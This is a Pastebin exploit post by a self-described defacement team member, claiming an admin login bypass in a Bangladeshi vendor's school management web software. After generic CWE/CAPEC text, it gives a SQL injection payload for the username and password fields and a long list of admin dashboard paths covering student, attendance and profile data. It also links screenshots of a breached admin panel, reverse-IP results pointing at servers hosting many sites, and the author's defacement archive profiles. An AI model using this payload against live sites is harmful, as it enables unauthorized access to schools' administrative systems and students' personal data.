Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Ja IT Solution JaisBD Bangladesh Software Authentication Bypass
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 17 May 2020
- # Vendor Homepage : jaisbd.com ~ facebook.com/jaisbd/
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Vulnerability Type : CWE-287 [ Improper Authentication ]
- CAPEC-115: Authentication Bypass
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
- # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
- zone-h.org/archive/notifier=CyBeRiZM
- # Mirror-H : mirror-h.org/search/hacker/948/
- mirror-h.org/search/hacker/94/
- mirror-h.org/search/hacker/1826/
- # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
- defacer.id/archive/team/Cyberizm-Org
- # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
- # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
- aljyyosh.org/hacker.php?id=Cyberizm.Org
- aljyyosh.org/hacker.php?id=Cyberizm
- # Zone-D : zone-d.org/attacker/id/69
- # Pastebin : pastebin.com/u/KingSkrupellos
- # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
- ####################################################################
- # Impact :
- ***********
- CWE-287 [ Improper Authentication ]
- Authentication is any process by which a system verifies the identity of a user who wishes
- to access it.When an actor claims to have a given identity, the software does not
- prove or insufficiently proves that the claim is correct. Improper authentication
- occurs when an application improperly verifies the identity of a user.
- A software incorrectly validates user's login information and as a result, an attacker can
- gain certain privileges within the application or disclose sensitive information that allows
- them to access sensitive data and provoke arbitrary code execution.
- The weakness is introduced during Architecture and Design, Implementation stages.
- CAPEC-115 [ Authentication Bypass ]
- An attacker gains access to application, service, or device with the privileges
- of an authorized or privileged user by evading or circumventing an authentication mechanism.
- The attacker is therefore able to access protected data without authentication ever having taken place.
- This refers to an attacker gaining access equivalent to an authenticated user without ever going
- through an authentication procedure. This is usually the result of the attacker using an unexpected
- access procedure that does not go through the proper checkpoints where authentication should occur.
- For example, a web site might assume that all users will click through a given link in order to get to
- secure material and simply authenticate everyone that clicks the link. However, an attacker might be
- able to reach secured web content by explicitly entering the path to the content rather than clicking
- through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
- other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
- faking authentication by exploiting flaws or by stealing credentials from legitimate users.
- ####################################################################
- # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
- ******************************************************************************
- Administrator Username : x' or 1=1 or 'x'='y
- Administrator Password : x' or 1=1 or 'x'='y
- /login
- /dashboard
- /MenuSetting
- /SystemManagement/updatepost/1
- /dashboard/admissioninformationlist
- /dashboard/addSchoolList
- /dashboard/sliderList
- /dashboard/mainCategory
- /dashboard/subCategory
- /class_routine
- /dashboard/mediafileList
- /dashboard/CustomPostList
- /Dashboard/addnewpost
- /dashboard/get_post_data/1/1
- /dashboard/get_post_data/1/2
- /dashboard/get_post_data/1/3
- /dashboard/get_post_data/1/4
- /dashboard/get_post_data/1/5
- /dashboard/addnewnotice/1/5
- /dashboard/get_post_data/8/22
- /dashboard/get_post_data/8/23
- /dashboard/get_post_data/8/24
- /dashboard/commondatalist/2/6
- /dashboard/get_post_data/2/7
- /dashboard/get_post_data/2/8
- /dashboard/get_post_data/2/9
- /dashboard/get_post_data/3/18
- /dashboard/get_post_data/3/19
- /dashboard/get_post_data/3/20
- /dashboard/get_post_data/3/21
- /dashboard/get_post_data/3/25
- /dashboard/get_post_management_data/1
- /dashboard/get_post_management_data/2
- /dashboard/get_post_management_data/3
- /dashboard/get_post_management_data/4
- /dashboard/get_post_data/5/10
- /dashboard/get_post_data/5/12
- /dashboard/get_post_data/5/13
- /dashboard/get_post_data/6/14
- /dashboard/get_post_data/6/15
- /dashboard/gallaryList
- /dashboard/get_post_data/7/17
- /dashboard/addnewnotice/7/17
- /classsetting/shiftlist
- /classsetting/classlist
- /classsetting/sectionlist
- /classsetting/grouplist
- /classsetting/sessionlist
- /classsetting/subjectlist
- /classsetting/studentlist
- /classsetting/versionlist
- /student_message
- /attendance_report
- /admission_report
- /dashboard/checkUserRole
- /dashboard/checkUserProfle
- /SystemManagement/UpdateProfileInformation
- ScreenShot Administrator Control Panel =>
- *****************************************
- https://www.upload.ee/image/11711630/jaitsolution1.png
- https://www.upload.ee/image/11711633/jaitsolution2.png
- https://www.upload.ee/image/11711634/jaitsolution3.png
- Reverse IP Results Information =>
- *******************************
- Reverse IP results for (64.188.2.216)
- There are 392 domains hosted on this server.
- Reverse IP results for (104.219.248.5)
- There are 174 domains hosted on this server.
- Reverse IP results for (94.130.13.164)
- There are 118 domains hosted on this server.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Army
- ####################################################################
Add Comment
Please, Sign In to add comment